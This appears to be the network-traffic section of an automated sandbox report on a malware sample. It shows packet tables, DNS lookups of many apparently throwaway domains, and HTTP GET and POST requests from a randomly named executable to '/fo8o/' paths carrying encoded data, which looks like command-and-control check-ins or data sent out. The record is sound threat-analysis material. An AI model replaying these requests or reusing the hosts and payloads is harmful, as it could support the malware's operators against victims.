Jan 13, 2025 09:28:41.100982904 CET	80	49984	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:41.860450029 CET	80	49984	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:41.860485077 CET	80	49984	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:41.860505104 CET	80	49984	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:41.860630035 CET	49984	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:42.038321972 CET	80	49984	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:42.038592100 CET	49984	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:42.604082108 CET	49984	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:43.622427940 CET	49985	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:43.628375053 CET	80	49985	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:43.631156921 CET	49985	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:43.635529995 CET	49985	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:43.640425920 CET	80	49985	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:44.282344103 CET	80	49985	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:44.282427073 CET	80	49985	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:44.283636093 CET	49985	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:45.134910107 CET	49985	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:46.155505896 CET	49986	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:46.160650015 CET	80	49986	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:46.165472984 CET	49986	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:46.165473938 CET	49986	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:46.170367002 CET	80	49986	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:46.170618057 CET	80	49986	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:46.818919897 CET	80	49986	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:46.818988085 CET	80	49986	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:46.819185019 CET	49986	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:47.683594942 CET	49986	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:48.700333118 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:48.705507994 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:48.705585003 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:48.708424091 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:48.713270903 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369004011 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369044065 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369064093 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369101048 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369119883 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369151115 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369169950 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369199991 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369221926 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369250059 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.369266987 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:49.369342089 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:49.369755983 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:49.374286890 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.374305964 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.374340057 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.374360085 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.374511003 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:49.466378927 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.466406107 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.466512918 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.466541052 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.466559887 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.466645002 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.466662884 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.466697931 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.466715097 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:49.466845989 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:49.466845989 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:49.467113972 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.467134953 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:49.467422009 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:49.471470118 CET	49987	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:49.476360083 CET	80	49987	91.195.240.94	192.168.2.7
Jan 13, 2025 09:29:02.626410961 CET	49988	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:02.631287098 CET	80	49988	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:02.631360054 CET	49988	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:02.633562088 CET	49988	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:02.638406038 CET	80	49988	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:03.231108904 CET	80	49988	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:03.231137991 CET	80	49988	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:03.231193066 CET	49988	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:04.150391102 CET	49988	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:05.169755936 CET	49989	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:05.174644947 CET	80	49989	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:05.174721956 CET	49989	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:05.176992893 CET	49989	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:05.181821108 CET	80	49989	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:05.776899099 CET	80	49989	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:05.776981115 CET	80	49989	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:05.777245045 CET	49989	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:06.681622028 CET	49989	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:07.699636936 CET	49990	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:07.704595089 CET	80	49990	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:07.707421064 CET	49990	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:07.711359024 CET	49990	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:07.716228962 CET	80	49990	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:07.716491938 CET	80	49990	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:08.323182106 CET	80	49990	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:08.323208094 CET	80	49990	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:08.323471069 CET	49990	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:09.212898016 CET	49990	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:10.287311077 CET	49991	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:10.292246103 CET	80	49991	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:10.294120073 CET	49991	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:10.311863899 CET	49991	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:10.316720009 CET	80	49991	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:10.892854929 CET	80	49991	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:10.892879009 CET	80	49991	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:10.893030882 CET	49991	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:10.895390034 CET	49991	80	192.168.2.7	66.29.149.46
Jan 13, 2025 09:29:10.900192022 CET	80	49991	66.29.149.46	192.168.2.7
Jan 13, 2025 09:29:15.994275093 CET	49992	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:16.005968094 CET	80	49992	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:16.006191969 CET	49992	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:16.008424997 CET	49992	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:16.013202906 CET	80	49992	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:16.673105001 CET	80	49992	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:16.673249006 CET	80	49992	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:16.673295021 CET	49992	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:17.509731054 CET	49992	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:18.528376102 CET	49993	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:18.533395052 CET	80	49993	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:18.533492088 CET	49993	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:18.535356045 CET	49993	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:18.540144920 CET	80	49993	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:19.209430933 CET	80	49993	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:19.209691048 CET	80	49993	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:19.209769011 CET	49993	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:20.043224096 CET	49993	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:21.059400082 CET	49994	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:21.064408064 CET	80	49994	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:21.064492941 CET	49994	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:21.066580057 CET	49994	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:21.071350098 CET	80	49994	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:21.071445942 CET	80	49994	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:21.753671885 CET	80	49994	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:21.753691912 CET	80	49994	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:21.753840923 CET	49994	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:22.572123051 CET	49994	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:23.591216087 CET	49995	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:23.765033960 CET	80	49995	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:23.767301083 CET	49995	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:23.771188974 CET	49995	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:23.776024103 CET	80	49995	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:24.436670065 CET	80	49995	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:24.437061071 CET	80	49995	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:24.437117100 CET	49995	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:24.439999104 CET	49995	80	192.168.2.7	195.110.124.133
Jan 13, 2025 09:29:24.446335077 CET	80	49995	195.110.124.133	192.168.2.7
Jan 13, 2025 09:29:46.257282019 CET	49996	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:46.262290955 CET	80	49996	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:46.263128996 CET	49996	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:46.267047882 CET	49996	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:46.271886110 CET	80	49996	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:46.846259117 CET	80	49996	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:46.846600056 CET	80	49996	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:46.846649885 CET	49996	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:47.775351048 CET	49996	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:48.794315100 CET	49997	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:48.799499989 CET	80	49997	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:48.799580097 CET	49997	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:48.801695108 CET	49997	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:48.807346106 CET	80	49997	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:49.390702009 CET	80	49997	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:49.390974045 CET	80	49997	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:49.391189098 CET	49997	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:50.307025909 CET	49997	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:51.324337959 CET	49998	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:51.329446077 CET	80	49998	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:51.329602003 CET	49998	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:51.331083059 CET	49998	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:51.335947990 CET	80	49998	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:51.336210012 CET	80	49998	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:51.907546043 CET	80	49998	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:51.907620907 CET	80	49998	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:51.907706976 CET	49998	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:52.837626934 CET	49998	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:53.858989954 CET	49999	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:53.864053011 CET	80	49999	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:53.864176989 CET	49999	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:53.866981983 CET	49999	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:53.871808052 CET	80	49999	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:54.438087940 CET	80	49999	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:54.438134909 CET	80	49999	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:54.438275099 CET	80	49999	217.196.55.202	192.168.2.7
Jan 13, 2025 09:29:54.438503027 CET	49999	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:54.440846920 CET	49999	80	192.168.2.7	217.196.55.202
Jan 13, 2025 09:29:54.445677996 CET	80	49999	217.196.55.202	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 09:26:40.943289042 CET	58946	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:26:41.407187939 CET	53	58946	1.1.1.1	192.168.2.7
Jan 13, 2025 09:26:57.357908964 CET	61360	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:26:57.366926908 CET	53	61360	1.1.1.1	192.168.2.7
Jan 13, 2025 09:27:05.466618061 CET	64398	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:27:05.825329065 CET	53	64398	1.1.1.1	192.168.2.7
Jan 13, 2025 09:27:19.500399113 CET	57516	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:27:19.509341002 CET	53	57516	1.1.1.1	192.168.2.7
Jan 13, 2025 09:27:27.608481884 CET	50690	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:27:27.709290028 CET	53	50690	1.1.1.1	192.168.2.7
Jan 13, 2025 09:28:41.028481007 CET	54111	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:28:41.085954905 CET	53	54111	1.1.1.1	192.168.2.7
Jan 13, 2025 09:28:54.482793093 CET	56408	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:28:54.513431072 CET	53	56408	1.1.1.1	192.168.2.7
Jan 13, 2025 09:29:02.582122087 CET	59176	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:29:02.623440027 CET	53	59176	1.1.1.1	192.168.2.7
Jan 13, 2025 09:29:15.905713081 CET	60818	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:29:15.991461992 CET	53	60818	1.1.1.1	192.168.2.7
Jan 13, 2025 09:29:29.450484991 CET	64570	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:29:29.460324049 CET	53	64570	1.1.1.1	192.168.2.7
Jan 13, 2025 09:29:37.531200886 CET	51186	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:29:37.913583994 CET	53	51186	1.1.1.1	192.168.2.7
Jan 13, 2025 09:29:45.983062983 CET	56193	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:29:46.252829075 CET	53	56193	1.1.1.1	192.168.2.7
Jan 13, 2025 09:29:59.450438976 CET	64896	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:29:59.459264040 CET	53	64896	1.1.1.1	192.168.2.7
Jan 13, 2025 09:30:07.538928986 CET	50886	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:30:07.547887087 CET	53	50886	1.1.1.1	192.168.2.7
Jan 13, 2025 09:30:15.610949039 CET	59938	53	192.168.2.7	1.1.1.1
Jan 13, 2025 09:30:15.640625000 CET	53	59938	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 09:26:40.943289042 CET	192.168.2.7	1.1.1.1	0xf86c	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:26:57.357908964 CET	192.168.2.7	1.1.1.1	0x1e2e	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:27:05.466618061 CET	192.168.2.7	1.1.1.1	0xfd43	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:27:19.500399113 CET	192.168.2.7	1.1.1.1	0x6044	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:27:27.608481884 CET	192.168.2.7	1.1.1.1	0x17fb	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:28:41.028481007 CET	192.168.2.7	1.1.1.1	0xf849	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:28:54.482793093 CET	192.168.2.7	1.1.1.1	0xc442	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:02.582122087 CET	192.168.2.7	1.1.1.1	0x7ac1	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:15.905713081 CET	192.168.2.7	1.1.1.1	0x3b2e	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:29.450484991 CET	192.168.2.7	1.1.1.1	0xdd8a	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:37.531200886 CET	192.168.2.7	1.1.1.1	0x69d1	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:45.983062983 CET	192.168.2.7	1.1.1.1	0xcfbe	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:59.450438976 CET	192.168.2.7	1.1.1.1	0xa989	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:30:07.538928986 CET	192.168.2.7	1.1.1.1	0x3122	Standard query (0)	www.k9vyp11no3.cfd	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:30:15.610949039 CET	192.168.2.7	1.1.1.1	0xb2e7	Standard query (0)	www.shenzhoucui.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 09:26:41.407187939 CET	1.1.1.1	192.168.2.7	0xf86c	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:26:57.366926908 CET	1.1.1.1	192.168.2.7	0x1e2e	Name error (3)	www.kasegitai.tokyo	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:27:05.825329065 CET	1.1.1.1	192.168.2.7	0xfd43	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:27:19.509341002 CET	1.1.1.1	192.168.2.7	0x6044	Name error (3)	www.antonio-vivaldi.mobi	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:27:27.709290028 CET	1.1.1.1	192.168.2.7	0x17fb	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 09:27:27.709290028 CET	1.1.1.1	192.168.2.7	0x17fb	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 09:27:27.709290028 CET	1.1.1.1	192.168.2.7	0x17fb	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:28:41.085954905 CET	1.1.1.1	192.168.2.7	0xf849	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:28:54.513431072 CET	1.1.1.1	192.168.2.7	0xc442	Name error (3)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:02.623440027 CET	1.1.1.1	192.168.2.7	0x7ac1	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:15.991461992 CET	1.1.1.1	192.168.2.7	0x3b2e	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 09:29:15.991461992 CET	1.1.1.1	192.168.2.7	0x3b2e	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:29.460324049 CET	1.1.1.1	192.168.2.7	0xdd8a	Name error (3)	www.donnavariedades.com	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:37.913583994 CET	1.1.1.1	192.168.2.7	0x69d1	Name error (3)	www.660danm.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:46.252829075 CET	1.1.1.1	192.168.2.7	0xcfbe	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 09:29:46.252829075 CET	1.1.1.1	192.168.2.7	0xcfbe	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:29:59.459264040 CET	1.1.1.1	192.168.2.7	0xa989	Name error (3)	www.joyesi.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:30:07.547887087 CET	1.1.1.1	192.168.2.7	0x3122	Name error (3)	www.k9vyp11no3.cfd	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 09:30:15.640625000 CET	1.1.1.1	192.168.2.7	0xb2e7	Name error (3)	www.shenzhoucui.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.goldenjade-travel.com

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49839	154.215.72.110	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:26:41.421354055 CET	528	OUT	GET /fo8o/?DZb=zf440xcx6XAL&6d6p=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyPSqftK4e48VmHPHqtN0zR7rhi1sr30t/oMfgteNmFfmnntRnM0qQ0ZY HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 13, 2025 09:26:42.307173014 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 13 Jan 2025 08:26:42 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49975	116.50.37.244	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:27:05.835652113 CET	812	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 